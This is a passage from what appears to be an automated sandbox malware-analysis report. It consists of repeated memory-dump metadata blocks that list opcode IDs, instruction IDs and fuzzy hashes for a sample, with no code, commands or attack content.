                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                            • Instruction ID: ef4a8188a1796df50cf9c423a2c8c338b17cd3ff046cf1e87d8483505b27fed9
                                                                                                                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                            • Instruction Fuzzy Hash: 4951A531D0060EEFEF229A94CC84FAEFB75AB00364F154665D9126B194DB70AE44CBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: aca7f399ff1566dd0309fed7713e1f0763f8c525abe75cd1b387b1b30db4127c
                                                                                                                                            • Instruction ID: 888c19fcaef68482c9960afeb186264f31ad48d50878ddf9fdcc21f292aee645
                                                                                                                                            • Opcode Fuzzy Hash: aca7f399ff1566dd0309fed7713e1f0763f8c525abe75cd1b387b1b30db4127c
                                                                                                                                            • Instruction Fuzzy Hash: A741F3727016019BD729DB2DC896B3BBB9EFF92360F048218E955C7288DB34DA41C691
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b2e367ae0cc71bb2d675e633011f486e188d1ac93d1e6b1e80541f9bd1ca92a8
                                                                                                                                            • Instruction ID: 1e86022f8abfd7524b03bd7b57a28cd87fde2696ebe77fe80686563357417d9e
                                                                                                                                            • Opcode Fuzzy Hash: b2e367ae0cc71bb2d675e633011f486e188d1ac93d1e6b1e80541f9bd1ca92a8
                                                                                                                                            • Instruction Fuzzy Hash: 6551A175900219DFCB21DFA9C9849AEFBB9FF48354B21455DD645A3305EB30AE41CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                            • Instruction ID: 3d6165a112515120737db2dec4f30b049b22114793707ee63b4e51a1909a3a84
                                                                                                                                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                            • Instruction Fuzzy Hash: 6141E8736027569FD729CF68C984A6AB7ADFF80314B05462EE952C7249EB30EE14C7D0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d40cea332be83800b06eb8f0ee2c7044aa89ce7b5bfdebdec6cea8e5005bfa56
                                                                                                                                            • Instruction ID: cc3897b493a7cf636141086d72c05cd4f394f6c4742c9fb9b762b0d5d3e0a914
                                                                                                                                            • Opcode Fuzzy Hash: d40cea332be83800b06eb8f0ee2c7044aa89ce7b5bfdebdec6cea8e5005bfa56
                                                                                                                                            • Instruction Fuzzy Hash: 1241CB36A80219DBDB10EF98C440AEEFBB4BF48710F15826EF815E7241D7359D49CBA4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cbb5614d603abd75fcf18fbae8a2d0584626eef5c1072e3e1145d0450f86af1c
                                                                                                                                            • Instruction ID: c18e95038acdf34a5e8a3c09a998b6b31a577113397d1d2c6d7406b0869238b0
                                                                                                                                            • Opcode Fuzzy Hash: cbb5614d603abd75fcf18fbae8a2d0584626eef5c1072e3e1145d0450f86af1c
                                                                                                                                            • Instruction Fuzzy Hash: 6541C3752043019FDB25DF28C884A6BF7E9FF88214F1049AAE957C7616EB35E884CB51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                            • Instruction ID: 77420e2118b65522063151a89a9a29b13aaffa5222bcd5317a8dbc904b35d853
                                                                                                                                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                            • Instruction Fuzzy Hash: 59513775A00619CFCB15CF9CC580AAEF7B2FF84B11F2481A9D915A7351E770AE82CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 50585af819920cb05c7a0bdc379bd21a85b1102f2406094279abc69357f51235
                                                                                                                                            • Instruction ID: 87996ea2f507fbc4a82830386dce3820276b09491e18519f523e4233dde2ef09
                                                                                                                                            • Opcode Fuzzy Hash: 50585af819920cb05c7a0bdc379bd21a85b1102f2406094279abc69357f51235
                                                                                                                                            • Instruction Fuzzy Hash: A4510470904206DBEB65DB28CC44BE9FBB1EF15314F1482E5E929972C5EB749981CF40
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a2137a88dd00140037c53225d1bb176461c5ec44f820dfef6fc3c6cb4d1890de
                                                                                                                                            • Instruction ID: 976bcf2b5bf6a22f75c47b0140193296b4b1e512acc7dffb5c0e923b062bfe74
                                                                                                                                            • Opcode Fuzzy Hash: a2137a88dd00140037c53225d1bb176461c5ec44f820dfef6fc3c6cb4d1890de
                                                                                                                                            • Instruction Fuzzy Hash: 4141AF31A002289BDF61DF68C944BEEFBB8AF85740F4101A5E908AB241DB749E84CB91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                            • Instruction ID: efd86f605dca702e4ac495992a4096d7e0c03fa14488c402fcb943b30a556088
                                                                                                                                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                            • Instruction Fuzzy Hash: 34419476B00105ABDB15DB99CC86AAFBBBEAF95710F144469E904D7349DA70DE008760
Memory Dump Source
• Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b360b6f5419ac6bd3e23724bbb8cd6bd0ac76cec1efc317082745eef318d6c74
• Instruction ID: e99fc6d5ce41e5fcd3af4dd4798d4d5786de5aea8711c5089a3dcb7d6f7f5a29
• Opcode Fuzzy Hash: b360b6f5419ac6bd3e23724bbb8cd6bd0ac76cec1efc317082745eef318d6c74
• Instruction Fuzzy Hash: 0E41F3B16007029FE365CF28C484A22FBF8FF89314B144A6DE94787A55EB70F845CB90
Memory Dump Source
• Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction ID: 810aba8c984257b12bb008f34d68eb97fe8050b9c0b82889bbd9c2b039d9d1f4
• Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction Fuzzy Hash: 54312731A00244AFDB228B69CC84BDBFBE9AF14350F0445A9FC56D7356C7749944CBA4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 197aa4d5b36803e47561b8d2caebd98f4ea30dbcdc815d88c184ed720a11b901
                                                                                                                                            • Instruction ID: 7518cb40ba9da6ebe27be47d53c7c95d75c0b4befae0c295266f04ee276015e9
                                                                                                                                            • Opcode Fuzzy Hash: 197aa4d5b36803e47561b8d2caebd98f4ea30dbcdc815d88c184ed720a11b901
                                                                                                                                            • Instruction Fuzzy Hash: 71319635740706ABDB229FA98C45F6BF6A8AB58B50F01002CBB04AB395DEA4DC00D7A1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ca25c56d282ff2e2540b160ba02369f394dd075780820e48fc3104b152ddd2fe
                                                                                                                                            • Instruction ID: 473481ac4ef7812a41d5330ed8246836971a16def78a70dcf74186c3d6cf4274
                                                                                                                                            • Opcode Fuzzy Hash: ca25c56d282ff2e2540b160ba02369f394dd075780820e48fc3104b152ddd2fe
                                                                                                                                            • Instruction Fuzzy Hash: EE31C1322456058FC332DF19DC90E26B7E5FF81360F19446EEA95CB295EB31AA00CF91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: aa23ad6a7dc8e4eb9abd25d6a3b3ee2b48fffdbe744888b8442d5bb0e633b748
                                                                                                                                            • Instruction ID: 88b9b7f5cb9b64d829af57da105b77e860aded658689ba03c965d0d267d40cb8
                                                                                                                                            • Opcode Fuzzy Hash: aa23ad6a7dc8e4eb9abd25d6a3b3ee2b48fffdbe744888b8442d5bb0e633b748
                                                                                                                                            • Instruction Fuzzy Hash: A941BC35204B459FD762CF28C884FD7BBE8BF49354F004429FA5A8B261D774E848CB60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 54eecdd1edab71dcdd5b91522b9c98284b57e7baca2900bc2679961bfa06181d
                                                                                                                                            • Instruction ID: 6d48e6d9b09c9c9cba9656f3d20d2d657b7f508aaf519c1256885044c061dc12
                                                                                                                                            • Opcode Fuzzy Hash: 54eecdd1edab71dcdd5b91522b9c98284b57e7baca2900bc2679961bfa06181d
                                                                                                                                            • Instruction Fuzzy Hash: E131CD312443058FD361DF28CC90A2AB7E5FB84720F19496DFA95CB291EB30EE00CB91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 871542fa0ec3e7d4beea58242fed93f550f1f82811a7af0e92e3db1a454a386a
                                                                                                                                            • Instruction ID: 9a939140f05d3376c27a7a71c190917d0cb0bd8172c357c00744cfdfeac2d733
                                                                                                                                            • Opcode Fuzzy Hash: 871542fa0ec3e7d4beea58242fed93f550f1f82811a7af0e92e3db1a454a386a
                                                                                                                                            • Instruction Fuzzy Hash: 2B3180316016869BF3265B5CC958F75FF98BB51F84F1900ACAF469B6D1DF28D880C221
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 56575ce66d340fb62b0563cd3c2430bbbe313a57e588a506d59ab4db62ff536f
                                                                                                                                            • Instruction ID: 84efe7380f1c6018ba9240d3563b9634ba52822b62df7b33d303be185bbbff7d
                                                                                                                                            • Opcode Fuzzy Hash: 56575ce66d340fb62b0563cd3c2430bbbe313a57e588a506d59ab4db62ff536f
                                                                                                                                            • Instruction Fuzzy Hash: 9231E476A0011AEBDB15DF98CC44BAEF7B9FB44744F554168E940EB248E7B0EE01CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 06973886e8eddff4df95cabda9f2ad69e8d63e577a1239b34d6f03ca7d4f8baa
                                                                                                                                            • Instruction ID: 6f6d52f8992760d0750b02ab32bc7b3af5dc4d8bbfe0f9bee38904e9000123c6
                                                                                                                                            • Opcode Fuzzy Hash: 06973886e8eddff4df95cabda9f2ad69e8d63e577a1239b34d6f03ca7d4f8baa
                                                                                                                                            • Instruction Fuzzy Hash: 6B318736A4012DABCF21DF54DC48BDFBBF9AB98350F1000A5AA09A7350CA30DE51CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d34e662c498769407e38d9a94b65778bcb8cf9e518059d66a12d04520ace5fea
                                                                                                                                            • Instruction ID: 6c81e4cc486d13e93b25133fed001f31b21dcc2c7e2bc36575cf943e07fa5cef
                                                                                                                                            • Opcode Fuzzy Hash: d34e662c498769407e38d9a94b65778bcb8cf9e518059d66a12d04520ace5fea
                                                                                                                                            • Instruction Fuzzy Hash: FC319272A00215AFDB21DEA9CC84FAEFBB8EF04750F1144A5E915E7260D6709E409BA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5ddecabb64b2e30aa84c216c8a25348039009ceb1844457962b5f5b41ac5cf4e
                                                                                                                                            • Instruction ID: 54c4161a4c363396e7c5969742afa16c6759d23fc2b1dd45f8d2d19fc4182a75
                                                                                                                                            • Opcode Fuzzy Hash: 5ddecabb64b2e30aa84c216c8a25348039009ceb1844457962b5f5b41ac5cf4e
                                                                                                                                            • Instruction Fuzzy Hash: 5731C876B00A16EFDB229F59CC50B6AB7BDAF44754F20406DE945DB346EAB0DE00CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ac97f26a8b455972cb4396dcf13f3c39fb6a0d30f1563bc69eedd3c28f1ae945
                                                                                                                                            • Instruction ID: 77520423e795a6c8365f9a1740e7470909b50434728e4fdaebadccfe0f0fc079
                                                                                                                                            • Opcode Fuzzy Hash: ac97f26a8b455972cb4396dcf13f3c39fb6a0d30f1563bc69eedd3c28f1ae945
                                                                                                                                            • Instruction Fuzzy Hash: C8310132A44712EBC762DE288884E6BFBA5AFD4360F014928FD59A7314DB70EC0187E1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fc35d9fba309af1e8a05b9daf94fec704c600fa2af3810dd15257d752fbcd8c2
                                                                                                                                            • Instruction ID: 958a9940910f2a129ee3d6ea63b810048c874ae432ee932a8c7926f5b239b7ba
                                                                                                                                            • Opcode Fuzzy Hash: fc35d9fba309af1e8a05b9daf94fec704c600fa2af3810dd15257d752fbcd8c2
                                                                                                                                            • Instruction Fuzzy Hash: 93319C7160A3018FE760CF19C880B6AFBE5FB88714F15496DF9849B351D7B0E844CB92
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                            • Instruction ID: 7287c49cbfce69d717e4af6471d69df6b49b14ce8902e9c7d94a2f34fb2f845a
                                                                                                                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                            • Instruction Fuzzy Hash: 98312CB2B40B01AFD761EF69DD40B57FBF8AB08B50F04052EA59AC3751E630E900DB64
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1aa23223d8a3d27ba563800739e7ff62abc803364a74ef85231bc7e8f655e280
                                                                                                                                            • Instruction ID: 9266a1c8a260b47dad4bf376f9d4ca2e1f715a1497b183dc9ae9d0c0b90d6ff5
                                                                                                                                            • Opcode Fuzzy Hash: 1aa23223d8a3d27ba563800739e7ff62abc803364a74ef85231bc7e8f655e280
                                                                                                                                            • Instruction Fuzzy Hash: 663198B15053418FCB21DF19C544A1AFBF5FF89314F0549AEF9889B362EB319A44CB92
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 832b0c0b2b1a2ce30deecdf9602aaab9c9d694d5d565fb79135a875712b4f68a
                                                                                                                                            • Instruction ID: 6fa497b6f2e49521badddc848a03c5e3e7e1a85fee1ce80204409a978f8bcdc9
                                                                                                                                            • Opcode Fuzzy Hash: 832b0c0b2b1a2ce30deecdf9602aaab9c9d694d5d565fb79135a875712b4f68a
                                                                                                                                            • Instruction Fuzzy Hash: 2431D471B002059FDB20DFA8C984BAEFBF9BB84308F108529D546D7654E730DE45DB91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                            • Instruction ID: 54af4b933ab379682d6fba52b352449f0544784a53b189184159c4ea32f2ceae
                                                                                                                                            • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                            • Instruction Fuzzy Hash: EB210432E4125AABDB119FB98800BBFFBB9AF54740F0581759E55EB340E370C900C7A4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d03793080bbea2457e993ea7518fa248d7bb787d672d6f2c178705313c4b315d
                                                                                                                                            • Instruction ID: a68ac1c50d97d67b80a65bb966e80415c7b6313048a55687424ed45cbe1451d2
                                                                                                                                            • Opcode Fuzzy Hash: d03793080bbea2457e993ea7518fa248d7bb787d672d6f2c178705313c4b315d
                                                                                                                                            • Instruction Fuzzy Hash: 25318BB15002018BD735AF58CC44BA8FB74EF90304F9482A9DD458B786EE74D981CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                            • Instruction ID: 7497d1a6263de52effbf283acc32b4966a261ea1095bd5bc09ba77de0828e320
                                                                                                                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                            • Instruction Fuzzy Hash: C7213B36600A5A67CB26AF998C44ABAFFB4FF40710F01815AFA95CA5D2E734DA40C361
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 264093e6cf630a60b16cedba9bcfe89f774b965b35d4d235def9e8ba9ae97b69
                                                                                                                                            • Instruction ID: e8722d5326a86fce4d3c4c2b2d04dd9a1a79b99d3df8a92521e7ea7b72cc9fcd
                                                                                                                                            • Opcode Fuzzy Hash: 264093e6cf630a60b16cedba9bcfe89f774b965b35d4d235def9e8ba9ae97b69
                                                                                                                                            • Instruction Fuzzy Hash: A331A231A015289BDB319B28DC41FEEF7B9BB15760F0101A1FA55A7290DB789E81CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                            • Instruction ID: d2f63c4046f0f43bec559ba5640e1549d93fd1b7a6fec14d380faab592bdec18
                                                                                                                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                            • Instruction Fuzzy Hash: 4D218031B4070AEBCB11DF58C980A8EFBA5FF48318F118069EE16DB241D6B1EA05CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
